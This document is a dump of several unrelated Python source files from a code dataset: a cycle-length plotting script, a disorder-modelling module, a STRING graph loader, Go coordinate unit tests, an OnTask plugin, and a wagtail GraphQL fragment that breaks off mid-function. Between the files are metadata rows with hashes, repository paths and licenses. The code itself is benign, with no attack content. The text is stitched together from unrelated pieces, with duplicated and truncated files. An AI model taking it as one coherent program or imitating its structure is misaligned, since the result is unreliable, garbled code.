print('******** Cycle-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), bootstrapped_KS_cycle_length.std(), bootstrapped_p_val_cycle_length.mean(), bootstrapped_p_val_cycle_length.std()
))
print('******** Cycle-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), np.percentile(bootstrapped_KS_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_KS_cycle_length, 97.5, axis=0),
bootstrapped_p_val_cycle_length.mean(), np.percentile(bootstrapped_p_val_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_cycle_length, 97.5, axis=0)
))
print('*************************************************************************')
print('******** Period-length KS={} (p={}) ***********'.format(true_KS_period_length, true_p_val_period_length))
print('******** Period-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_period_length.mean(), bootstrapped_KS_period_length.std(), bootstrapped_p_val_period_length.mean(), bootstrapped_p_val_period_length.std()
))
print('******** Period-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_period_length.mean(), np.percentile(bootstrapped_KS_period_length, 2.5, axis=0), np.percentile(bootstrapped_KS_period_length, 97.5, axis=0),
bootstrapped_p_val_period_length.mean(), np.percentile(bootstrapped_p_val_period_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_period_length, 97.5, axis=0)
))
print('*************************************************************************')
def plot_avg_lengths_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, save_dir):
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
colors = ['slateblue', 'c', 'orange']
max_cycle_id=20
if attribute == 'cycle_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
axes[index].plot(np.unique(dataset['cycle_id'])[:max_cycle_id], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Cycle length')
axes[index].set_ylim(20,55)
plt.text(12, 7, '(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
axes[index].plot(np.unique(dataset['cycle_id'])[:max_cycle_id], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Period length')
axes[index].set_ylim(1,9)
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
def plot_max_intercycle_length_hists(cycle_stats, cycle_stats_exclude_flagged, save_dir):
my_bins=np.arange(min(cycle_stats['max_inter_cycle_length']), max(cycle_stats['max_inter_cycle_length']) + 1)
plt.hist(cycle_stats['max_inter_cycle_length'], bins=my_bins, label='With behaviorally-tainted cycles', color='blue', histtype='step')
plt.hist(cycle_stats_exclude_flagged['max_inter_cycle_length'], bins=my_bins, label='Excluding behaviorally-tainted cycles', color='red', histtype='step')
plt.autoscale(enable=True, tight=True, axis='x')
plt.ylim(0,38000)
plt.xlabel('Maximum CLD in days')
plt.ylabel('User count with maximum CLD')
plt.savefig('{}/hist_max_inter_cycle_length_with_and_without_excluded_flags.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
def plot_median_vs_max_intercycle_length(cycle_stats, save_dir):
plt.hist2d(cycle_stats['median_inter_cycle_length'], cycle_stats['max_inter_cycle_length'], bins=(75, 75), cmap='jet', norm=colors.LogNorm())
plt.autoscale(enable=True, tight=True)
range_vals_median = np.linspace(min(cycle_stats['median_inter_cycle_length']), max(cycle_stats['median_inter_cycle_length']), 100)
plt.plot(range_vals_median, range_vals_median+10, label='Median CLD + 10', color='red')
plt.xlabel('Median CLD')
plt.ylabel('Maximum CLD')
plt.xlim((0,75))
plt.ylim((0, 75))
plt.colorbar()
plt.savefig('{}/median_vs_max_scatter_2d_hist.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
def plot_median_CLD_hist(cycle_stats, pdf_or_cdf, save_dir):
my_bins=np.arange(cycle_stats['median_inter_cycle_length'].dropna().min(),cycle_stats['median_inter_cycle_length'].dropna().max()+1)
all_counts, all_bins = np.histogram(cycle_stats['median_inter_cycle_length'].dropna(), bins=my_bins, density=True)
if pdf_or_cdf=='pdf':
hist_type='stepfilled'
cumulative=False
y_label='P(Median CLD = n)'
cohort_filename = '{}/median_CLD_pdf_cohort.pdf'.format(save_dir)
elif pdf_or_cdf=='cdf':
hist_type='step'
cumulative=True
y_label='P(Median CLD $\leq$ n)'
cohort_filename = '{}/median_CLD_cdf_cohort.pdf'.format(save_dir)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xlabel('Median CLD in days')
plt.ylabel(y_label)
plt.grid(True)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
| true
| true
|
f70b6edc5aee3ac2d67c6163cc07e8550165c5db
| 4,030
|
py
|
Python
|
cmpy/disorder.py
|
dylanljones/cmpy
|
21adcf4dd9f873ae29d47aeaef4fbcd914bfce2c
|
[
"MIT"
] | 2
|
2021-11-17T13:39:37.000Z
|
2021-12-14T09:30:57.000Z
|
cmpy/disorder.py
|
dylanljones/cmpy
|
21adcf4dd9f873ae29d47aeaef4fbcd914bfce2c
|
[
"MIT"
] | null | null | null |
cmpy/disorder.py
|
dylanljones/cmpy
|
21adcf4dd9f873ae29d47aeaef4fbcd914bfce2c
|
[
"MIT"
] | null | null | null |
# coding: utf-8
#
# This code is part of cmpy.
#
# Copyright (c) 2022, Dylan Jones
"""This module contains methods for modeling disorder."""
import numpy as np
from typing import Union, Sequence
def create_subst_array(
size: int, values: Sequence[float], conc: Union[float, Sequence[float]]
) -> np.ndarray:
"""Creates an (ordered) array of values.
Parameters
----------
size : int
The size of the output array.
values : Sequence of float
The values used to fill the array. Their number must match the number of
concentrations. If a single concentration is given, the value array must have size 2.
conc : float or Sequence of float
The concentrations of the values. If a single concentration is given
it is interpreted as the concentration of the first of two values.
Returns
-------
array : np.ndarray
The (ordered) array filled with the given values.
"""
# Get sizes of sub-arrays
if isinstance(conc, float):
conc = [conc, 1 - conc]
if sum(conc) != 1:
raise ValueError("Fractions have to add up to 1!")
sizes = (size * np.array(conc)).astype(np.int64)
sizes[-1] += size - sum(sizes)
# create sub-arrays
arrays = [np.full(size, val) for size, val in zip(sizes, values)]
return np.concatenate(arrays)
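# Hedged usage sketch (the _demo_* helper is added for illustration and is not part
# of the original module): with a single concentration of 0.25, the remaining 0.75
# is assigned to the second value.
def _demo_create_subst_array():
    arr = create_subst_array(4, values=[0.0, 1.0], conc=0.25)
    # arr == array([0., 1., 1., 1.])
    return arr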
def random_permutations(
arr: Sequence[float], size: int, replace: bool = False, seed: int = None
):
"""Creates (optionally unique) permutations of a given array.
Parameters
----------
arr : (N) np.ndarray
The input array to permute.
size : int
The number of permutations to generate.
replace : bool, optional
If `False`, only unique permutations are returned. The default is `False`.
seed : int, optional
An optional seed to initialize the random number generator.
Yields
------
perm : (N) np.ndarray
The permuted array.
Examples
--------
>>> a = [0, 0, 1, 1, 1]
>>> perm = random_permutations(a, size=2, seed=0)
>>> next(perm)
array([1, 1, 1, 0, 0])
>>> next(perm)
array([0, 1, 1, 1, 0])
"""
rng = np.random.default_rng(seed)
p = np.array(arr)
seen = set()
count = 0
while True:
if count >= size:
break
rng.shuffle(p)
if not replace:
phash = hash(p.data.tobytes())
if phash not in seen:
seen.add(phash)
yield p
count += 1
else:
yield p
count += 1
def disorder_generator(
size: int,
values: Sequence[float],
conc: Union[float, Sequence[float]],
samples: int,
replace: bool = False,
seed=None,
):
"""Generates (optionally unique) random samples from a given 1-D array.
See Also
--------
random_permutations
Parameters
----------
size : int
The size of the output array.
values : Sequence of float
The values for filling the array. The size must match the size of the
concentrations. If one concentration is given the value-array must be of size 2.
conc : float or Sequence of float
The concentrations of the values. If a single concentration is given
it is interpreted as the concentration of the first of two values.
samples : int
The number of random arrays to generate.
replace : bool, optional
If `False`, only unique permutations are returned. The default is `False`.
seed : int, optional
An optional seed to initialize the random number generator.
Yields
------
perm : (N) np.ndarray
The randomly sampled arrays.
Examples
--------
>>> eps = disorder_generator(5, values=[0, +1], conc=[0.4, 0.6], samples=2, seed=0)
>>> next(eps)
array([1, 1, 1, 0, 0])
>>> next(eps)
array([0, 1, 1, 1, 0])
"""
ordered = create_subst_array(size, values, conc)
return random_permutations(ordered, samples, replace, seed)
| 28.181818
| 88
| 0.600744
|
import numpy as np
from typing import Union, Sequence
def create_subst_array(
size: int, values: Sequence[float], conc: Union[float, Sequence[float]]
) -> np.ndarray:
if isinstance(conc, float):
conc = [conc, 1 - conc]
if sum(conc) != 1:
raise ValueError("Fractions have to add up to 1!")
sizes = (size * np.array(conc)).astype(np.int64)
sizes[-1] += size - sum(sizes)
arrays = [np.full(size, val) for size, val in zip(sizes, values)]
return np.concatenate(arrays)
def random_permutations(
arr: Sequence[float], size: int, replace: bool = False, seed: int = None
):
rng = np.random.default_rng(seed)
p = np.array(arr)
seen = set()
count = 0
while True:
if count >= size:
break
rng.shuffle(p)
if not replace:
phash = hash(p.data.tobytes())
if phash not in seen:
seen.add(phash)
yield p
count += 1
else:
yield p
count += 1
def disorder_generator(
size: int,
values: Sequence[float],
conc: Union[float, Sequence[float]],
samples: int,
replace: bool = False,
seed=None,
):
ordered = create_subst_array(size, values, conc)
return random_permutations(ordered, samples, replace, seed)
| true
| true
|
f70b708bbdac7d2781674c92fd8e90e059902171
| 3,501
|
py
|
Python
|
bindings/python/ensmallen/datasets/string/sphingomonashankookensis.py
|
AnacletoLAB/ensmallen
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 5
|
2021-09-10T18:31:58.000Z
|
2022-03-24T04:28:04.000Z
|
bindings/python/ensmallen/datasets/string/sphingomonashankookensis.py
|
AnacletoLAB/ensmallen_graph
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 18
|
2021-01-07T16:47:39.000Z
|
2021-08-12T21:51:32.000Z
|
bindings/python/ensmallen/datasets/string/sphingomonashankookensis.py
|
AnacletoLAB/ensmallen
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 3
|
2021-01-14T02:20:59.000Z
|
2021-08-04T19:09:52.000Z
|
"""
This file offers the methods to automatically retrieve the graph Sphingomonas hankookensis.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def SphingomonasHankookensis(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Sphingomonas hankookensis graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Whether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2
Whether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs/string"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instance of the Sphingomonas hankookensis graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="SphingomonasHankookensis",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
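# Hedged usage sketch (the _demo_* helper is added for illustration): the first call
# downloads and preprocesses the graph, later calls reuse the cache. Requires network
# access on the first run.
def _demo_retrieve_graph() -> Graph:
    return SphingomonasHankookensis(directed=False)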
| 33.342857
| 223
| 0.680377
|
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph
def SphingomonasHankookensis(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
return AutomaticallyRetrievedGraph(
graph_name="SphingomonasHankookensis",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| true
| true
|
f70b70c4057ddb22121863cfd747a26613e1e6ec
| 4,612
|
py
|
Python
|
tests/test_coords.py
|
awesome-archive/minigo
|
188fb197fdafbe9664a32142373b1cbd1459bc67
|
[
"Apache-2.0"
] | null | null | null |
tests/test_coords.py
|
awesome-archive/minigo
|
188fb197fdafbe9664a32142373b1cbd1459bc67
|
[
"Apache-2.0"
] | null | null | null |
tests/test_coords.py
|
awesome-archive/minigo
|
188fb197fdafbe9664a32142373b1cbd1459bc67
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy
import coords
import go
from tests import test_utils
class TestCoords(test_utils.MiniGoUnitTest):
def test_upperleft(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.unflatten_coords(0), (0, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((1,9)), (0, 0))
self.assertEqual(coords.unparse_sgf_coords((0, 0)), 'aa')
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.to_human_coord((0, 0)), 'A9')
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
def test_topleft(self):
self.assertEqual(coords.parse_sgf_coords('ia'), (0, 8))
self.assertEqual(coords.unflatten_coords(8), (0, 8))
self.assertEqual(coords.parse_kgs_coords('J9'), (0, 8))
self.assertEqual(coords.parse_pygtp_coords((9,9)), (0, 8))
self.assertEqual(coords.unparse_sgf_coords((0, 8)), 'ia')
self.assertEqual(coords.flatten_coords((0, 8)), 8)
self.assertEqual(coords.to_human_coord((0, 8)), 'J9')
self.assertEqual(coords.unparse_pygtp_coords((0, 8)), (9, 9))
def test_pass(self):
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unflatten_coords(81), None)
self.assertEqual(coords.parse_kgs_coords('pass'), None)
self.assertEqual(coords.parse_pygtp_coords((0,0)), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(coords.flatten_coords(None), 81)
self.assertEqual(coords.to_human_coord(None), 'pass')
self.assertEqual(coords.unparse_pygtp_coords(None), (0, 0))
def test_parsing_9x9(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.parse_sgf_coords('ac'), (2, 0))
self.assertEqual(coords.parse_sgf_coords('ca'), (0, 2))
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(
'aa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('aa')))
self.assertEqual(
'sa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('sa')))
self.assertEqual(
(1, 17),
coords.parse_sgf_coords(coords.unparse_sgf_coords((1, 17))))
self.assertEqual(coords.parse_kgs_coords('A1'), (8, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_kgs_coords('C2'), (7, 2))
self.assertEqual(coords.parse_kgs_coords('J2'), (7, 8))
self.assertEqual(coords.parse_pygtp_coords((1, 1)), (8, 0))
self.assertEqual(coords.parse_pygtp_coords((1, 9)), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((3, 2)), (7, 2))
self.assertEqual(coords.unparse_pygtp_coords((8, 0)), (1, 1))
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
self.assertEqual(coords.unparse_pygtp_coords((7, 2)), (3, 2))
self.assertEqual(coords.to_human_coord((0,8)), 'J9')
self.assertEqual(coords.to_human_coord((8,0)), 'A1')
def test_flatten(self):
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.flatten_coords((0, 3)), 3)
self.assertEqual(coords.flatten_coords((3, 0)), 27)
self.assertEqual(coords.unflatten_coords(27), (3, 0))
self.assertEqual(coords.unflatten_coords(10), (1, 1))
self.assertEqual(coords.unflatten_coords(80), (8, 8))
self.assertEqual(coords.flatten_coords(coords.unflatten_coords(10)), 10)
self.assertEqual(coords.unflatten_coords(coords.flatten_coords((5, 4))), (5, 4))
def test_unflatten_coords_ndindex_equivalence(self):
ndindices = list(numpy.ndindex(go.N, go.N))
flat_coords = list(range(go.N * go.N))
self.assertEqual(list(map(coords.unflatten_coords, flat_coords)), ndindices)
| 46.12
| 88
| 0.670425
|
import unittest
import numpy
import coords
import go
from tests import test_utils
class TestCoords(test_utils.MiniGoUnitTest):
def test_upperleft(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.unflatten_coords(0), (0, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((1,9)), (0, 0))
self.assertEqual(coords.unparse_sgf_coords((0, 0)), 'aa')
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.to_human_coord((0, 0)), 'A9')
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
def test_topleft(self):
self.assertEqual(coords.parse_sgf_coords('ia'), (0, 8))
self.assertEqual(coords.unflatten_coords(8), (0, 8))
self.assertEqual(coords.parse_kgs_coords('J9'), (0, 8))
self.assertEqual(coords.parse_pygtp_coords((9,9)), (0, 8))
self.assertEqual(coords.unparse_sgf_coords((0, 8)), 'ia')
self.assertEqual(coords.flatten_coords((0, 8)), 8)
self.assertEqual(coords.to_human_coord((0, 8)), 'J9')
self.assertEqual(coords.unparse_pygtp_coords((0, 8)), (9, 9))
def test_pass(self):
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unflatten_coords(81), None)
self.assertEqual(coords.parse_kgs_coords('pass'), None)
self.assertEqual(coords.parse_pygtp_coords((0,0)), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(coords.flatten_coords(None), 81)
self.assertEqual(coords.to_human_coord(None), 'pass')
self.assertEqual(coords.unparse_pygtp_coords(None), (0, 0))
def test_parsing_9x9(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.parse_sgf_coords('ac'), (2, 0))
self.assertEqual(coords.parse_sgf_coords('ca'), (0, 2))
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(
'aa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('aa')))
self.assertEqual(
'sa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('sa')))
self.assertEqual(
(1, 17),
coords.parse_sgf_coords(coords.unparse_sgf_coords((1, 17))))
self.assertEqual(coords.parse_kgs_coords('A1'), (8, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_kgs_coords('C2'), (7, 2))
self.assertEqual(coords.parse_kgs_coords('J2'), (7, 8))
self.assertEqual(coords.parse_pygtp_coords((1, 1)), (8, 0))
self.assertEqual(coords.parse_pygtp_coords((1, 9)), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((3, 2)), (7, 2))
self.assertEqual(coords.unparse_pygtp_coords((8, 0)), (1, 1))
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
self.assertEqual(coords.unparse_pygtp_coords((7, 2)), (3, 2))
self.assertEqual(coords.to_human_coord((0,8)), 'J9')
self.assertEqual(coords.to_human_coord((8,0)), 'A1')
def test_flatten(self):
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.flatten_coords((0, 3)), 3)
self.assertEqual(coords.flatten_coords((3, 0)), 27)
self.assertEqual(coords.unflatten_coords(27), (3, 0))
self.assertEqual(coords.unflatten_coords(10), (1, 1))
self.assertEqual(coords.unflatten_coords(80), (8, 8))
self.assertEqual(coords.flatten_coords(coords.unflatten_coords(10)), 10)
self.assertEqual(coords.unflatten_coords(coords.flatten_coords((5, 4))), (5, 4))
def test_unflatten_coords_ndindex_equivalence(self):
ndindices = list(numpy.ndindex(go.N, go.N))
flat_coords = list(range(go.N * go.N))
self.assertEqual(list(map(coords.unflatten_coords, flat_coords)), ndindices)
| true
| true
|
f70b7227b620424d036d27f17a1cc64db679149c
| 4,193
|
py
|
Python
|
src/plugins/test_plugin_2/__init__.py
|
ShizhuZhang/ontask_b
|
acbf05ff9b18dae0a41c67d1e41774e54a890c40
|
[
"MIT"
] | 3
|
2018-08-24T10:48:40.000Z
|
2020-05-29T06:33:23.000Z
|
src/plugins/test_plugin_2/__init__.py
|
ShizhuZhang/Ontask_b_zh
|
ca4526871f26e7153b724b1e97b922a0b52f75d6
|
[
"MIT"
] | null | null | null |
src/plugins/test_plugin_2/__init__.py
|
ShizhuZhang/Ontask_b_zh
|
ca4526871f26e7153b724b1e97b922a0b52f75d6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import pandas as pd
# The field class_name contains the name of the class to load to execute the
# plugin.
class_name = 'OntaskTestPlugin'
class OntaskTestPlugin(object):
"""
Example of a class that implements the OnTask plugin interface. The
objects of this class have to provide the following elements:
1. name: Plugin name shown to the users.
2. description_txt: A string with the detailed description of what the
plugin does
3. input_column_names: A potentially empty list of column names (strings).
If the list is empty, the columns are selected by the user at execution
time.
4. output_column_names: Non-empty list of names (strings) of the columns
to be used for the output of the transformation.
5. parameters: a possibly empty list of tuples with the following
structure:
('name', type, [list of allowed values], initial value, help_text)
These elements will be requested from the user before executing the
plugin through a form. The conditions on these values are:
- name must be a string
- type must be a string equal to "integer", "double", "string",
"datetime" or "boolean".
- The list of allowed values restricts the possible values
- The initial value must be of the type specified by the second
element.
- Help_text a string to show as help text
6. method "run" that receives:
- a pandas data frame with the data to process
- a string with the name of the key column that will be used to merge
the result.
- A dictionary of pairs (name, value) with the parameters described in
the previous element.
and returns a result Pandas data frame. This frame **must** have one
column with the key column name provided so that it can be properly
merged with the existing data.
"""
def __init__(self):
self.name = 'Test Plugin 2 Name'
self.description_txt = 'Test Plugin 2 Description Text'
self.input_column_names = ['A1', 'A2']
self.output_column_names = ['RESULT 3', 'RESULT 4']
self.parameters = [
('param string', 'string', ['v1', 'v2'], 'v1', 'help param string'),
('param integer', 'integer', [], None, 'help param integer'),
('param double', 'double', [1.2, 2.2, 3.2], None,
'help param double'),
('param boolean', 'boolean', [], True, 'help param boolean'),
('param datetime', 'datetime', [], '2018-05-25 18:03:00+09:30',
'help param datetime'),
('param datetime2', 'datetime',
[],
'2018-05-25 18:03:00+09:30',
'help param datetime'),
]
def run(self, data_frame, merge_key, parameters=None):
"""
Method to overwrite. Receives a data frame with a number of columns
stipulated by the num_column_input pair, the name of a key column and a
dictionary with parameters of the form name, value.
Runs the algorithm and returns a pandas data frame structure that is
merged with the existing data frame in the workflow using the merge_key.
:param data_frame: Input data for the plugin
:param merge_key: Name of the column key that will be used for merging
:param parameters: Dictionary with (name, value) pairs.
:return: a Pandas data_frame to merge with the existing one (must
contain a column with name merge_key)
"""
# Extract the key column from the given data frame
result = pd.DataFrame(data_frame[merge_key])
# Process the given data and create the result
result[self.output_column_names[0]] = \
data_frame[self.input_column_names[0]] + \
data_frame[self.input_column_names[1]]
result[self.output_column_names[1]] = \
data_frame[self.input_column_names[0]] - \
data_frame[self.input_column_names[1]]
return result
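# Hedged usage sketch (the _demo_* helper is added for illustration and is not part
# of the plugin module): exercising run() on a toy frame with a key column plus the
# two input columns the plugin declares.
def _demo_run_plugin():
    df = pd.DataFrame({'key': [1, 2], 'A1': [10, 20], 'A2': [3, 4]})
    result = OntaskTestPlugin().run(df, 'key', parameters={})
    # result columns: 'key', 'RESULT 3' (= A1 + A2), 'RESULT 4' (= A1 - A2)
    return result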
| 39.933333
| 80
| 0.632721
|
from __future__ import unicode_literals, print_function
import pandas as pd
class_name = 'OntaskTestPlugin'
class OntaskTestPlugin(object):
def __init__(self):
self.name = 'Test Plugin 2 Name'
self.description_txt = 'Test Plugin 2 Description Text'
self.input_column_names = ['A1', 'A2']
self.output_column_names = ['RESULT 3', 'RESULT 4']
self.parameters = [
('param string', 'string', ['v1', 'v2'], 'v1', 'help param string'),
('param integer', 'integer', [], None, 'help param integer'),
('param double', 'double', [1.2, 2.2, 3.2], None,
'help param double'),
('param boolean', 'boolean', [], True, 'help param boolean'),
('param datetime', 'datetime', [], '2018-05-25 18:03:00+09:30',
'help param datetime'),
('param datetime2', 'datetime',
[],
'2018-05-25 18:03:00+09:30',
'help param datetime'),
]
def run(self, data_frame, merge_key, parameters=None):
result = pd.DataFrame(data_frame[merge_key])
result[self.output_column_names[0]] = \
data_frame[self.input_column_names[0]] + \
data_frame[self.input_column_names[1]]
result[self.output_column_names[1]] = \
data_frame[self.input_column_names[0]] - \
data_frame[self.input_column_names[1]]
return result
| true
| true
|
f70b72e4d5f4604427e2f7259e15eaf0fc83e22f
| 3,735
|
py
|
Python
|
strawberry_wagtail/stream_field.py
|
patrick91/strawberry-wagtail
|
cfb94cd09be32dc720bda2d366aa8824f7d3ea5c
|
[
"MIT"
] | 22
|
2022-03-25T08:32:04.000Z
|
2022-03-31T03:01:49.000Z
|
strawberry_wagtail/stream_field.py
|
patrick91/strawberry-wagtail
|
cfb94cd09be32dc720bda2d366aa8824f7d3ea5c
|
[
"MIT"
] | 6
|
2022-03-25T03:32:03.000Z
|
2022-03-25T15:21:20.000Z
|
strawberry_wagtail/stream_field.py
|
patrick91/strawberry-wagtail
|
cfb94cd09be32dc720bda2d366aa8824f7d3ea5c
|
[
"MIT"
] | null | null | null |
import dataclasses
from typing import Any, Callable, List, Optional, Type
from wagtail.core.blocks.field_block import CharBlock, FieldBlock, RichTextBlock
from wagtail.core.blocks.stream_block import StreamBlock
from wagtail.core.fields import StreamField
from wagtail.images.blocks import ImageChooserBlock
import strawberry
import strawberry.django
from strawberry.union import StrawberryUnion
from strawberry.utils.str_converters import capitalize_first, to_camel_case
from .scalars import HTML
def _make_type(
class_name: str, value_field_name: str, value_type: Type, from_data: Callable
) -> Type:
